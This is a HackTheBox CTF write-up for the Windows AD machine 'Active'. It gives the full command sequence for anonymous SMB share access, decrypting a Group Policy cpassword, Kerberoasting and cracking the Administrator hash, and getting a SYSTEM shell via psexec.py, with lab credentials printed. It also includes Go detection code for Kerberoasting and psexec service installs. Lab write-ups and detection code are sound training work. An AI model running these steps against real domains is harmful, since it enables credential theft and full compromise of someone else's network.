Metadata

  • Platform: HackTheBox
  • CTF: Active
  • OS: Windows
  • Difficulty: Easy

Summary

With guest-level read access to an SMB share, the target exposes an AD group policy configuration file. In it, we find a username as well as a cpassword entry, which we can simply decrypt. This access then allows us to look for kerberoastable accounts on the AD domain, one of which is Administrator. After retrieving the hash and cracking it, we obtain access to this account, compromising the machine.

Solution

Reconnaissance

With the help of Nmap, we quickly notice that we are dealing with an AD environment.

nmap -sC -sV 10.10.10.100 -oN nmap.txt -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 11:23 CEST
Nmap scan report for 10.10.10.100
Host is up (0.046s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-02 09:23:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2025-04-02T09:24:35
|_  start_date: 2025-04-02T09:21:14
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Since the target does not have that many services we can interact with without credentials, we should start by checking for guest-level access. For the open SMB service, we can test this with smbclient.

smbclient -L //10.10.10.100/ -N
Anonymous login successful
 
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      

From this output, we know that we do in fact have access without any credentials. Nevertheless, the server restricts our anonymous access to only one of the two non-standard shares, Replication. In it, we find a folder with several AD-specific files. For our own comfort, we can download the entire share to our local machine, making it easier to look for valuable files.

smbclient //10.10.10.100/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
<cut>

Once the download completes, let’s start by searching for credentials, such as a password.

grep -r password .                                                                                                       
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

User Flag

We have a hit in Groups.xml, where the command found the entry cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" for the user active.htb\SVC_TGS. Exposed cpasswords can be easily decrypted, since the corresponding AES key is publicly known. For this, we can use a tool such as gpp-decrypt.py.

python3 gpp-decrypt.py -c 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/home/kali/htb/machines/active/gpp-decrypt/gpp-decrypt.py:13: SyntaxWarning: invalid escape sequence '\ '
  / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 
                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         
 
[ * ] Password: GPPstillStandingStrong2k18

Great! Now we have a set of credentials, active.htb\SVC_TGS:GPPstillStandingStrong2k18, which we can use to authenticate against the target. While we can’t connect over WinRM, since the respective port is not open, we can still connect to the Users SMB share, which we were not able to access with our guest session. This share seems to map the target’s Users folder, containing all personal directories. We can therefore claim the user flag on the Desktop of SVC_TGS.

smbclient //10.10.10.100/Users -U svc_TGS
Password for [WORKGROUP\svc_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018
dc303b6fb2afbfd823f3ea975da10f05

Root Flag

Oftentimes, credentials with access to SMB can grant us a shell over psexec. However, our current credentials only grant us read access to the SMB shares, while this tool requires write access. As far as a shell is concerned, we are therefore stuck with our current access level. Nevertheless, we can use these credentials to enumerate the domain further. As a priority, we should check for any kerberoastable accounts using GetUserSPNs.py.

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2025-04-02 11:22:28.566567

The Administrator account is kerberoastable! This would be a great way to escalate our privileges, so let’s request the Kerberos hash.

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2025-04-02 11:22:28.566567             
 
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9856<cut>5bd9

Once we save this to a file, we can try to crack it with Hashcat.

hashcat hash -m 13100 /usr/share/wordlists/rockyou.txt
 
<cut>
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9856<cut>5bd9:Ticketmaster1968
<cut>

Quickly, we obtain this account’s password. Just like for the user flag, we can use these credentials to connect to the Users share and claim the root flag on the Administrator’s desktop.

f1e10e8d8a89ee05cdf483bb3bc7f5e6
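What the roast above looks like from the domain controller's side is worth spelling out, so here is a detection example added to this writeup (not code from the page or from Impacket). The hash cracked above starts with $krb5tgs$23$: etype 23, or 0x17, is RC4-HMAC, which is what GetUserSPNs.py -request asks for by default because the RC4 ticket is keyed directly from the NT hash and cracks fastest. On the DC, every such request is a Security Event 4769 with TicketEncryptionType=0x17 and a ServiceName that is a user account rather than a computer account. The code applies two checks over constructed events, one mirroring the request above: an RC4 ticket for a user-account SPN, and one requester collecting tickets for several distinct user-account SPNs. The "Key=Value;..." line format, the sweepThreshold value and the function names are my own assumptions.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// etypeRC4HMAC is the TicketEncryptionType behind a $krb5tgs$23$ hash.
const etypeRC4HMAC = 0x17

// sweepThreshold is an assumed tuning value: an account pulling tickets for
// this many distinct user-account SPNs is treated as enumerating them.
const sweepThreshold = 3

// Event4769 holds the fields of "A Kerberos service ticket was requested"
// that matter for spotting Kerberoasting.
type Event4769 struct {
	Account string // TargetUserName: who asked for the ticket
	Service string // ServiceName: the account owning the SPN
	Etype   int    // TicketEncryptionType
	Status  string // 0x0 means the KDC issued the ticket
}

// ParseEvent4769 reads the constructed "Key=Value;Key=Value" flattening used
// in this example (a real export would be XML or JSON).
func ParseEvent4769(line string) (Event4769, error) {
	var ev Event4769
	for _, kv := range strings.Split(line, ";") {
		parts := strings.SplitN(kv, "=", 2)
		if len(parts) != 2 {
			return ev, fmt.Errorf("malformed field %q", kv)
		}
		switch parts[0] {
		case "TargetUserName":
			ev.Account = parts[1]
		case "ServiceName":
			ev.Service = parts[1]
		case "Status":
			ev.Status = parts[1]
		case "TicketEncryptionType":
			n, err := strconv.ParseInt(parts[1], 0, 32) // base 0 accepts "0x17"
			if err != nil {
				return ev, fmt.Errorf("bad etype %q: %w", parts[1], err)
			}
			ev.Etype = int(n)
		}
	}
	if ev.Account == "" || ev.Service == "" {
		return ev, fmt.Errorf("missing TargetUserName or ServiceName in %q", line)
	}
	return ev, nil
}

// Alert is one suspicious ticket request.
type Alert struct{ Account, Service, Reason string }

// DetectKerberoast flags RC4 tickets for user-account SPNs and requesters that
// collect tickets for sweepThreshold or more distinct user-account SPNs.
func DetectKerberoast(lines []string) ([]Alert, error) {
	var alerts []Alert
	seen := map[string]map[string]bool{} // requester -> distinct SPN owners
	for _, l := range lines {
		ev, err := ParseEvent4769(l)
		if err != nil {
			return nil, err
		}
		svc := strings.ToLower(ev.Service)
		// Failed requests, machine accounts and the TGT service are not roastable.
		if ev.Status != "0x0" || strings.HasSuffix(svc, "$") || svc == "krbtgt" {
			continue
		}
		if ev.Etype == etypeRC4HMAC {
			alerts = append(alerts, Alert{ev.Account, ev.Service, "RC4 (0x17) service ticket for a user-account SPN"})
		}
		if seen[ev.Account] == nil {
			seen[ev.Account] = map[string]bool{}
		}
		seen[ev.Account][svc] = true
		if len(seen[ev.Account]) == sweepThreshold {
			alerts = append(alerts, Alert{ev.Account, "*", fmt.Sprintf("tickets for %d distinct user-account SPNs", sweepThreshold)})
		}
	}
	return alerts, nil
}

// sampleEvents are constructed; the first mirrors the request made above.
var sampleEvents = []string{
	"TargetUserName=SVC_TGS@ACTIVE.HTB;ServiceName=Administrator;TicketEncryptionType=0x17;Status=0x0",
	"TargetUserName=SVC_TGS@ACTIVE.HTB;ServiceName=DC$;TicketEncryptionType=0x12;Status=0x0",
	"TargetUserName=jdoe@ACTIVE.HTB;ServiceName=sqlsvc;TicketEncryptionType=0x12;Status=0x0",
	"TargetUserName=jdoe@ACTIVE.HTB;ServiceName=krbtgt;TicketEncryptionType=0x12;Status=0x0",
}

func main() {
	alerts, err := DetectKerberoast(sampleEvents)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, a := range alerts {
		fmt.Printf("%s -> %s: %s\n", a.Account, a.Service, a.Reason)
	}
}
```

The RC4 check only stays quiet on a domain where service accounts have AES keys: an account whose msDS-SupportedEncryptionTypes does not advertise AES gets RC4 tickets from every client, so the first thing to fix is the accounts, not the rule. The underlying exposure here is the Administrator account carrying an SPN at all; an SPN belongs on a dedicated, long-password (or group managed) service account, never on a privileged user.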

Since we have compromised the Administrator account, we also obtained write access on the SMB service. Therefore, we can now use psexec to spawn a shell as NT AUTHORITY\SYSTEM.

psexec.py Administrator:Ticketmaster1968@10.10.10.100   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file SULVAUOt.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service kwLz on 10.10.10.100.....
[*] Starting service kwLz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
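The output above shows exactly what psexec.py leaves behind on the host: a binary with a random name uploaded to ADMIN$ (which maps to the Windows directory) and a service with a random name created to run it. Both land in the System event log as Event 7045, "A service was installed in the system", with an ImagePath pointing directly into the Windows root. The check below, an example added here and not code from this writeup or from Impacket, parses constructed 7045 records (the first modelled on the run above) and flags installs whose binary sits directly in the Windows directory rather than in System32 or Program Files, where legitimate services live. The "Key=Value;..." line format, the knownServices allow-list and the function names are my own assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// Event7045 is the System log "A service was installed in the system" record,
// reduced to the fields this check needs.
type Event7045 struct {
	ServiceName string
	ImagePath   string
	Account     string // ServiceAccount
}

// ParseEvent7045 reads the constructed "Key=Value;Key=Value" flattening used here.
func ParseEvent7045(line string) (Event7045, error) {
	var ev Event7045
	for _, kv := range strings.Split(line, ";") {
		parts := strings.SplitN(kv, "=", 2)
		if len(parts) != 2 {
			return ev, fmt.Errorf("malformed field %q", kv)
		}
		switch parts[0] {
		case "ServiceName":
			ev.ServiceName = parts[1]
		case "ImagePath":
			ev.ImagePath = parts[1]
		case "ServiceAccount":
			ev.Account = parts[1]
		}
	}
	if ev.ServiceName == "" || ev.ImagePath == "" {
		return ev, fmt.Errorf("missing ServiceName or ImagePath in %q", line)
	}
	return ev, nil
}

// DroppedInWindowsRoot reports whether the service binary sits directly in the
// Windows directory, which is where a file uploaded to ADMIN$ lands.
func DroppedInWindowsRoot(imagePath string) bool {
	p := strings.ToLower(strings.Trim(strings.TrimSpace(imagePath), `"`))
	if i := strings.Index(p, ".exe"); i >= 0 {
		p = p[:i+4] // drop any arguments after the binary
	}
	i := strings.LastIndex(p, `\`)
	if i < 0 {
		return false
	}
	dir, file := p[:i], p[i+1:]
	return (dir == `%systemroot%` || dir == `c:\windows`) && strings.HasSuffix(file, ".exe")
}

// knownServices is a placeholder allow-list; in practice it comes from a
// baseline of the service installs expected on the host.
var knownServices = map[string]bool{"sense": true, "winrm": true}

// FlagServiceInstalls returns the names of services whose install looks like a
// remote-exec tool dropping a binary into ADMIN$ and starting it as a service.
func FlagServiceInstalls(lines []string) ([]string, error) {
	var flagged []string
	for _, l := range lines {
		ev, err := ParseEvent7045(l)
		if err != nil {
			return nil, err
		}
		if knownServices[strings.ToLower(ev.ServiceName)] {
			continue
		}
		if DroppedInWindowsRoot(ev.ImagePath) {
			flagged = append(flagged, ev.ServiceName)
		}
	}
	return flagged, nil
}

// sampleInstalls are constructed; the first is modelled on the psexec.py run above.
var sampleInstalls = []string{
	`ServiceName=kwLz;ImagePath=%SystemRoot%\SULVAUOt.exe;ServiceAccount=LocalSystem`,
	`ServiceName=Sense;ImagePath="C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe";ServiceAccount=LocalSystem`,
	`ServiceName=WinRM;ImagePath=C:\Windows\System32\svchost.exe -k NetworkService;ServiceAccount=NT AUTHORITY\NetworkService`,
	`ServiceName=Backup;ImagePath=C:\Windows\backup.exe;ServiceAccount=LocalSystem`,
}

func main() {
	flagged, err := FlagServiceInstalls(sampleInstalls)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, s := range flagged {
		fmt.Println("suspicious service install:", s)
	}
}
```

Pairing the 7045 hit with the preceding Security Event 4624 logon type 3 and the 5145 share access to ADMIN$ from the same source address gives the full chain; and since psexec.py needs write access to ADMIN$ or C$, the preventive control is simply that no account used for daily work holds local administrator rights on the domain controller.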